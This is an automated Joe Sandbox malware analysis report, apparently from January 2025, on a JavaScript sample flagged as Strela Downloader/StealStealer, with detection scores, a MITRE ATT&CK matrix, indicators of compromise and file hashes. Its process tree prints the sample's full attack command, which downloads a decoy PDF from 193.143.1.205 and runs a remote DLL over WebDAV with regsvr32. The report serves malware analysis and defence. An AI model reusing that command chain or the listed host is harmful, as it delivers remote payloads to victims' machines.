Windows
Analysis Report
11804174121566513871.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 5232 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\11804 1741215665 13871.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 5616 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\268 2517961299 15.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3580 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1172 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 3660 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 1012 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 5344 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 32 --field -trial-han dle=1544,i ,173439762 6963525869 7,38468677 1685080520 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 5412 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588321 |
Start date and time: | 2025-01-10 23:57:31 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 11804174121566513871.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 2.23.242.162, 23.209.209.135, 199.232.210.172, 2.16.168.105, 2.16.168.107, 23.40.179.78, 23.40.179.72, 23.40.179.4, 23.40.179.73, 23.40.179.74, 23.40.179.76, 23.40.179.71, 23.40.179.69, 23.40.179.5, 192.168.2.6, 13.107.246.45, 3.219.243.226, 4.175.87.197, 104.126.112.182
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
17:58:24 | API Interceptor | |
17:58:28 | API Interceptor | |
17:58:28 | API Interceptor | |
17:58:35 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263293563871396 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0y:9JZj5MiKNnNhoxuX |
MD5: | 9EC27BDEA4CF006B9C994A75F3D3FD58 |
SHA1: | AEE200799941851005142E6A3610AD217889BFFC |
SHA-256: | A2C0615C65E35F8E99098DB853ABA3AD82E16F124D6EE10CCC141C9633DF8D4A |
SHA-512: | 1A4885EDC1AE3D8A320AA7C2B9C9C99122A522CBEE9A4375BD2C6A649A055B76C9D549492519ED94D50BD2936F77D6D685099EC60BC299EFF101F0EB7618489A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.75559455220484 |
Encrypted: | false |
SSDEEP: | 1536:NSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:NazaSvGJzYj2UlmOlOL |
MD5: | 1263077E75F8121A9E121C4BC94E2EF2 |
SHA1: | EEEEAE5F1BBE673F671379B0EFA30D98A6207E02 |
SHA-256: | C774112E7129678196F345E0838022E30B16278B575793B9A121012072EE49CC |
SHA-512: | 9B5DCE667EC531ED7B98B7EEEB8821F244474EE31F7953EDC2E2E3D5BA45B4448567CDE95B327120E603955EB7F6E61188A63E44F2B0385A240C21B418D0E72E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07953451355636751 |
Encrypted: | false |
